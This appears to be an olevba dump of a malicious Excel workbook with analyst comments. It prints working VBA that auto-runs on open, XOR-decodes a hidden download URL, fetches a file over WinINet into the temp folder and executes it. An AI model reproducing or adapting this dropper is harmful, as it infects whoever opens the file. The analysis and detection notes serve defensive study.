dynamoo

Malicious Excel macro

Mar 19th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 3.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 3.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisBook.cls
  13. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisBook'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open() ' Auto-exec entry point (the AutoExec row in ANALYSIS below): runs as soon as the workbook is opened with macros enabled and does nothing except call Phamt72loaj, which lives in File643.bas further down this listing.
  16. Phamt72loaj ' -> File643.bas; from there the chain continues to KokoRuko in Module1.bas
  17. End Sub
  18.  
  19. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  20. ANALYSIS:
  21. +----------+---------------+----------------------------------------+
  22. | Type     | Keyword       | Description                            |
  23. +----------+---------------+----------------------------------------+
  24. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  25. +----------+---------------+----------------------------------------+
  26. -------------------------------------------------------------------------------
  27. VBA MACRO Page1.cls
  28. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page1'
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. (empty macro)
  31. -------------------------------------------------------------------------------
  32. VBA MACRO Page2.cls
  33. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page2'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35. (empty macro)
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Page3.cls
  38. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page3'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. (empty macro)
  41. -------------------------------------------------------------------------------
  42. VBA MACRO Heroro6.bas
  43. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Heroro6'
  44. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  45. Option Explicit ' Heroro6.bas: WinINet imports under random alias names. The Alias clause carries the real export, so a static rule should key on "InternetOpenUrlA"/"InternetReadFile" next to "wininet.dll", not on the local names. These four calls are the entire network layer used by TOPONO6 in Loop4.bas.
  46.  
  47. #If VBA7 And Win64 Then ' 64-bit Office: handles are LongPtr; the #Else branch is the identical 32-bit set with Long handles
  48. Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long ' HUDZOAKJJ = InternetCloseHandle
  49. Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr ' AJJJAKKL3 = InternetOpenA; sAgent becomes the HTTP User-Agent ("PRO1" is passed from Loop4.bas)
  50. Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer ' BVBAJAIE1 = InternetReadFile; lNumberOfBytesRead is the ByRef out-parameter the read loop in TOPONO6 tests
  51. Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr ' ALKJPEQQ1 = InternetOpenUrlA
  52. #Else
  53. Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  54. Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  55. Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  56. Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  57. #End If ' No base64 literal is visible in this module; the "Base64 Strings" hit in ANALYSIS below is most likely the random alias names matching olevba's heuristic - verify with --decode.
  58. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  59. ANALYSIS:
  60. +------------+----------------+-----------------------------------------+
  61. | Type       | Keyword        | Description                             |
  62. +------------+----------------+-----------------------------------------+
  63. | Suspicious | Lib            | May run code from a DLL                 |
  64. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  65. |            |                | may be used to obfuscate strings        |
  66. |            |                | (option --decode to see all)            |
  67. | IOC        | wininet.dll    | Executable file name                    |
  68. +------------+----------------+-----------------------------------------+
  69. -------------------------------------------------------------------------------
  70. VBA MACRO File55.bas
  71. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File55'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73.  
  74. '''+----                                                                   --+
  75. '''|                             Ariawase 0.6.0                              |
  76. '''|                Ariawase is free library for VBA cowboys.                |
  77. '''|          The Project Page: https://github.com/vbaidiot/Ariawase         |
  78. '''+--                                                                   ----+
  79. Option Explicit
  80. Option Private Module ' File55.bas holds only the Ariawase banner above and these two Option lines: no procedures follow, and the banner URL is the only IOC olevba reports for it. Presumably a library fragment left in as filler - TODO confirm against the Ariawase source.
  81.  
  82.  
  83.  
  84. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  85. ANALYSIS:
  86. +------+----------------------+-------------+
  87. | Type | Keyword              | Description |
  88. +------+----------------------+-------------+
  89. | IOC  | https://github.com/v | URL         |
  90. |      | baidiot/Ariawase     |             |
  91. +------+----------------------+-------------+
  92. -------------------------------------------------------------------------------
  93. VBA MACRO File643.bas
  94. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File643'
  95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  96.  
  97.  
  98.  
  99.  
  100. Public Enum CdoProtocolsAuthentication ' CDO mail-authentication constants (File643.bas); no module in this listing references this enum - presumably filler, like the cdo* constants that follow it
  101.     cdoAnonymous = 0
  102.     cdoBasic = 1
  103.     cdoNTLM = 2
  104. End Enum
  105.  
  106. Public Const cdo7bit        As String = "7bit" ' cdo* transfer-encoding and charset names; none of them is referenced by any module in this listing
  107. Public Const cdo8bit        As String = "8bit"
  108. Public Const cdoISO_2022_JP As String = "iso-2022-jp"
  109. Public Const cdoShift_JIS   As String = "shift-jis"
  110. Public Const cdoEUC_JP      As String = "euc-jp"
  111. Public Const cdoUTF_8       As String = "utf-8"
  112.  
  113. Public Const cdoBase64          As String = "base64"
  114. Public Const cdoQuotedPrintable As String = "quoted-printable"
  115. Sub Phamt72loaj() ' Second hop of the chain Workbook_Open -> Phamt72loaj -> KokoRuko (Module1.bas); the only real work here is the KokoRuko call.
  116.  
  117. Dim KLAKKKSMMCV As Integer
  118. For KLAKKKSMMCV = 0 To 0 ' Single-iteration loop whose body can never fire (the counter is 0, the test is 22): a no-op. The same "For x = 0 To 0 / If x = N Then End" shape recurs in MANAHD3 and KokoRuko and is a usable code-pattern signature for this sample.
  119. If KLAKKKSMMCV = 22 Then End
  120. Next KLAKKKSMMCV
  121. KokoRuko ' defined in Module1.bas
  122.  
  123. End Sub
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  132. ANALYSIS:
  133. +------------+----------------+-----------------------------------------+
  134. | Type       | Keyword        | Description                             |
  135. +------------+----------------+-----------------------------------------+
  136. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  137. |            |                | may be used to obfuscate strings        |
  138. |            |                | (option --decode to see all)            |
  139. +------------+----------------+-----------------------------------------+
  140. -------------------------------------------------------------------------------
  141. VBA MACRO Loop4.bas
  142. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Loop4'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144. Option Explicit ' Loop4.bas: parameters for the WinINet downloader TOPONO6 below
  145.  
  146.  
  147. Private Const MBL = 8162 ' read-buffer size in bytes (also the declared length of the fixed-length string HAHABU4)
  148. Private Const AAN As String = "PRO1" ' passed as sAgent to InternetOpenA, i.e. the HTTP User-Agent header - a cheap network detection hook for this sample
  149. Private Const IOTD = 1 ' lAccessType for InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT (no proxy)
  150. Private Const IFNCW = &H4000000 ' dwFlags for InternetOpenUrlA; &H4000000 is INTERNET_FLAG_NO_CACHE_WRITE, so do not expect a copy of the response in the WinINet cache during forensics
  151. Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean ' Downloader: fetches LINKO via WinINet (aliases declared in Heroro6.bas) and writes the body to FILO1 in binary mode. Returns True only when at least one byte was received, False on any handle failure. There is no On Error handling anywhere in the function.
  152.     #If VBA7 And Win64 Then
  153.         Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr ' HOHOFO2 = session handle, HOHOFI1 = URL handle
  154.     #Else
  155.         Dim HOHOFO2 As Long, HOHOFI1 As Long
  156.     #End If
  157.     Dim HIHORE2 As Long ' bytes returned by the most recent InternetReadFile call
  158.     Dim HAHABU4 As String * MBL, HUHUHISD6 As String ' fixed-length read buffer and the accumulated response body
  159.     Dim HEHEIFI5 As Integer, KLOPA8 As Double ' file number; KLOPA8 holds the response length and doubles as the success flag
  160.     HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0) ' InternetOpenA with User-Agent "PRO1", direct access
  161.     If HOHOFO2 = 0 Then
  162.         Exit Function ' session creation failed: returns False with nothing written
  163.     End If
  164.     HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0) ' InternetOpenUrlA with the no-cache-write flag
  165.     If HOHOFI1 = 0 Then
  166.         KLOPA8 = 0
  167.     Else
  168.         BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2 ' InternetReadFile: first chunk
  169.         HUHUHISD6 = HAHABU4 ' NOTE(analysis): the first chunk is copied whole (all MBL characters) rather than trimmed to HIHORE2 like the later ones, so the dropped file can carry padding from the fixed-length buffer - keep this in mind when hashing a recovered payload
  170.         Do While HIHORE2 <> 0 ' keep reading until InternetReadFile reports 0 bytes
  171.             BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
  172.             HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
  173.         Loop
  174.         KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
  175.         Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5 ' file drop; the path is assembled in KokoRuko (temp folder + decoded file name)
  176.         Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
  177.     End If
  178.     HUDZOAKJJ HOHOFI1 ' InternetCloseHandle on both handles (HOHOFI1 may still be 0 here)
  179.     HUDZOAKJJ HOHOFO2
  180.     HUHUHISD6 = ""
  181.     If KLOPA8 Then ' non-zero response length => success
  182.         TOPONO6 = True
  183.     End If
  184. End Function
  185.  
  186. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  187. ANALYSIS:
  188. +------------+----------------+-----------------------------------------+
  189. | Type       | Keyword        | Description                             |
  190. +------------+----------------+-----------------------------------------+
  191. | Suspicious | Open           | May open a file                         |
  192. | Suspicious | Write          | May write to a file (if combined with   |
  193. |            |                | Open)                                   |
  194. | Suspicious | Put            | May write to a file (if combined with   |
  195. |            |                | Open)                                   |
  196. | Suspicious | Binary         | May read or write a binary file (if     |
  197. |            |                | combined with Open)                     |
  198. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  199. |            |                | may be used to obfuscate strings        |
  200. |            |                | (option --decode to see all)            |
  201. +------------+----------------+-----------------------------------------+
  202. -------------------------------------------------------------------------------
  203. VBA MACRO Corob5.bas
  204. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Corob5'
  205. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  206. Private Sub cdsf56GG() ' Dead code: every GoTo jumps to the label on the very next line, so the procedure does nothing, and nothing in this listing calls it. Same shape as IHYbeffeVuJC below - padding/obfuscation, not logic.
  207. GoTo cssghjtky7
  208. cssghjtky7:
  209. GoTo louioui89
  210. louioui89:
  211. GoTo mgsmshm
  212. mgsmshm:
  213. GoTo ntyntyty
  214. ntyntyty:
  215. GoTo nyttdndny
  216. nyttdndny:
  217. GoTo brtjtjty
  218. brtjtjty:
  219.  
  220. End Sub
  221. Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String ' String decoder: tarampam1 is a hex string (two characters per byte); each byte is XORed with a character of the key parampam1 (index (i Mod Len(key)) + 1, so the key is consumed starting at its second character) and the result is returned as a plain string. KokoRuko calls it with the key ceew343vgVV and the hex constants from Module1.bas to recover ProgIDs, the drop path and the download URL at runtime.
  222.     Dim ziZItoTO1 As Long
  223.     Dim loLOpoPO1 As String
  224.     Dim keKEpePE1 As Integer
  225.    
  226.     Dim DKKALLLAKK As Integer
  227. For DKKALLLAKK = 0 To 0 ' no-op loop, same pattern as in Phamt72loaj
  228. If DKKALLLAKK = 25 Then End
  229. Next DKKALLLAKK
  230.    
  231.     Dim keKEpePE11 As Integer
  232.  
  233.     For ziZItoTO1 = 1 To (Len(tarampam1) / 2) ' one iteration per encoded byte
  234.         keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2))) ' next two hex digits -> byte value
  235.         keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1)) ' key byte, cycling through parampam1
  236.         Dim LOAJNNCDHJ As Integer
  237.         For LOAJNNCDHJ = 0 To 0 ' no-op loop
  238.         If LOAJNNCDHJ = 14 Then End
  239.         Next LOAJNNCDHJ
  240.         loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11) ' the Chr/Xor pair olevba flags in ANALYSIS below
  241.          Dim PAPPAPPPAPP As Integer
  242.         For PAPPAPPPAPP = 0 To 0 ' no-op loop
  243.         If PAPPAPPPAPP = 4 Then End
  244.         Next PAPPAPPPAPP
  245.     Next ziZItoTO1
  246.    MANAHD3 = loLOpoPO1
  247. End Function
  248.  
  249. Private Sub IHYbeffeVuJC() ' Dead code, like cdsf56GG above: each GoTo targets the next line's label, nothing in this listing calls it.
  250. GoTo asefbttttawf3
  251. asefbttttawf3:
  252. GoTo sgr4bsgbf67gfh
  253. sgr4bsgbf67gfh:
  254. GoTo sdvxcxb
  255. sdvxcxb:
  256. GoTo SSSDFBSS
  257. SSSDFBSS:
  258. GoTo UTYRURU
  259. UTYRURU:
  260. GoTo KKTKTJT
  261. KKTKTJT:
  262. GoTo IhzKeee2ascfacas2zw
  263. IhzKeee2ascfacas2zw:
  264.  
  265. End Sub
  266.  
  267. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  268. ANALYSIS:
  269. +------------+---------+-----------------------------------------+
  270. | Type       | Keyword | Description                             |
  271. +------------+---------+-----------------------------------------+
  272. | Suspicious | Chr     | May attempt to obfuscate specific       |
  273. |            |         | strings                                 |
  274. | Suspicious | Xor     | May attempt to obfuscate specific       |
  275. |            |         | strings                                 |
  276. +------------+---------+-----------------------------------------+
  277. -------------------------------------------------------------------------------
  278. VBA MACRO Class1.cls
  279. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  280. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  281. Private xInit As Boolean ' Class1.cls: a small init-once tuple (Init, Item1..Item4 getters, ToArray); resembles the Ariawase Tuple class whose banner appears in File55.bas - TODO confirm. Nothing else in this listing instantiates it.
  282. Private xItems As Variant ' the ParamArray handed to Init
  283. Private xLength As Long ' UBound(xItems) + 1, set in Init
  284.  
  285. Public Property Get Item1() As Variant ' First element. No bounds check here (Init refuses fewer than 2 items); Set/Let split so object and scalar items both work.
  286.     Dim i As Long: i = 0
  287.     If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
  288. End Property
  289.  
  290. Public Property Get Item2() As Variant ' Second element; no bounds check, same reasoning as Item1.
  291.     Dim i As Long: i = 1
  292.     If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
  293. End Property
  294.  
  295. Public Property Get Item3() As Variant ' Third element; raises error 380 when the tuple holds fewer than 3 items.
  296.     Dim i As Long: i = 2
  297.     If xLength <= i Then Err.Raise 380
  298.     If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
  299. End Property
  300.  
  301. Public Property Get Item4() As Variant ' Fourth element; raises error 380 when the tuple holds fewer than 4 items.
  302.     Dim i As Long: i = 3
  303.     If xLength <= i Then Err.Raise 380
  304.     If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
  305. End Property
  306.  
  307. Public Sub Init(ParamArray itms() As Variant) ' One-shot initialiser: raises error 5 if called a second time or with fewer than 2 items.
  308.     If xInit Then Err.Raise 5
  309.     xItems = itms
  310.     xLength = UBound(itms) + 1
  311.    
  312.     If xLength < 2 Then Err.Raise 5 ' note xItems/xLength are already assigned at this point
  313.     xInit = True
  314. End Sub
  315.  
  316. Public Function ToArray() As Variant ' Returns the item array as a Variant.
  317.     ToArray = xItems
  318. End Function
  319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  320. ANALYSIS:
  321. No suspicious keyword or IOC found.
  322. -------------------------------------------------------------------------------
  323. VBA MACRO Module1.bas
  324. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  326. Private Const vEVeE3286 = "3F1B161F0042324643595C520D181A1C1D" ' Module1.bas: four hex-encoded strings, each decoded at runtime by MANAHD3 with the key ceew343vgVV below. Decoded by hand from the key and hex on this page: vEVeE3286 and cemMmm381 are the "Shell.Application" and "Scripting.FileSystemObject" ProgIDs; ceceexcxxXXd is the dropped file name and ceecqq902 the download URL - their plaintext is not on this page, decode them the same way and record them as file and network IOCs.
  327. Private Const rabannsd4 = 30 ' rabannsd0..4 are never referenced in this listing
  328. Private Const ceceexcxxXXd = "30270116070D1F525C00041F091416"
  329. Private Const rabannsd2 = 31
  330. Private Const ceecqq902 = "0407070356435C5B454204085D555D171643060019515C5B1F091416"
  331. Private Const rabannsd1 = 33
  332. Private Const cemMmm381 = "3F10011A1C181A58541B73580009200A0018091E79515F505218"
  333. Private Const rabannsd0 = 34
  334.  
  335. Private Const ceew343vgVV = "llssslls63551" ' XOR key for MANAHD3
  336. Sub KokoRuko() ' Final stage: FileSystemObject -> temp-folder path -> delete any old copy -> TOPONO6 download -> Shell.Application .Open on the dropped file. This module has no Option Explicit, so BIGABBDH1, dwwwdFO2, SSSS and SASASA are implicit Variants. The "For x = 0 To 0" loops are the same no-ops as in Phamt72loaj.
  337.  
  338.  
  339. Dim lodppo21
  340. Set lodppo21 = CreateObject _
  341. (MANAHD3(ceew343vgVV, cemMmm381)) ' cemMmm381 decodes to the Scripting.FileSystemObject ProgID
  342. Dim UPANDNNN2
  343. Const conspol3 = 2 ' GetSpecialFolder(2) is TemporaryFolder
  344. Dim DLAPPAKKVD3 As Integer
  345. For DLAPPAKKVD3 = 0 To 0
  346. If DLAPPAKKVD3 = 4 Then End
  347. Next DLAPPAKKVD3
  348. Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3) ' user temp folder
  349. Dim LPPAOOOAOAOMXNXNN As Integer
  350. For LPPAOOOAOAOMXNXNN = 0 To 0
  351. If LPPAOOOAOAOMXNXNN = 5 Then End
  352. Next LPPAOOOAOAOMXNXNN
  353. BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd) ' full drop path: temp folder & decoded file name
  354. Dim PAOOKDKDKDAJWHNN21 As Integer
  355. For PAOOKDKDKDAJWHNN21 = 0 To 0
  356. If PAOOKDKDKDAJWHNN21 = 5 Then End
  357. Next PAOOKDKDKDAJWHNN21
  358. Set dwwwdFO2 = CreateObject _
  359. (MANAHD3(ceew343vgVV, cemMmm381)) ' second FileSystemObject instance
  360. Dim ASS555ASS As Integer
  361. For ASS555ASS = 0 To 0
  362. If ASS555ASS = 5 Then End
  363. Next ASS555ASS
  364. If dwwwdFO2.FileExists(BIGABBDH1) Then ' remove a stale copy before downloading
  365. dwwwdFO2.DeleteFile BIGABBDH1
  366. End If
  367. Dim APOHRKJBMXIKSHJ As Integer
  368. For APOHRKJBMXIKSHJ = 0 To 0
  369. If APOHRKJBMXIKSHJ = 15 Then End
  370. Next APOHRKJBMXIKSHJ
  371. If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then ' download decoded URL -> drop path (Loop4.bas); the return value is ignored, the If body is empty
  372. End If
  373. Set SSSS = Nothing ' SSSS is never assigned anywhere; harmless
  374. Dim ALOOEPPPEPP2 As Integer
  375. For ALOOEPPPEPP2 = 0 To 0
  376. If ALOOEPPPEPP2 = 8 Then End
  377. Next ALOOEPPPEPP2
  378. If dwwwdFO2.FileExists(BIGABBDH1) Then ' empty If: execution continues regardless of whether the drop exists
  379. End If
  380. Dim PLKJHAGGGTTTS As Integer
  381. For PLKJHAGGGTTTS = 0 To 0
  382. If PLKJHAGGGTTTS = 3 Then End
  383. Next PLKJHAGGGTTTS
  384. Set SASASA = CreateObject _
  385. (MANAHD3(ceew343vgVV, vEVeE3286)) ' vEVeE3286 decodes to the Shell.Application ProgID
  386. Dim APQIEJAQPLQ As Integer
  387. For APQIEJAQPLQ = 0 To 0
  388. If APQIEJAQPLQ = 5 Then End
  389. Next APQIEJAQPLQ
  390. SASASA.Open BIGABBDH1 ' opens the dropped file with its shell handler (executes it if it is an executable). Detection: Excel creating a process from the user temp folder shortly after a wininet download, or a macro instantiating FileSystemObject plus Shell.Application.
  391.  
  392. End Sub
  393. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  394. ANALYSIS:
  395. +------------+--------------+-----------------------------------------+
  396. | Type       | Keyword      | Description                             |
  397. +------------+--------------+-----------------------------------------+
  398. | Suspicious | CreateObject | May create an OLE object                |
  399. | Suspicious | Open         | May open a file                         |
  400. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  401. |            |              | be used to obfuscate strings (option    |
  402. |            |              | --decode to see all)                    |
  403. +------------+--------------+-----------------------------------------+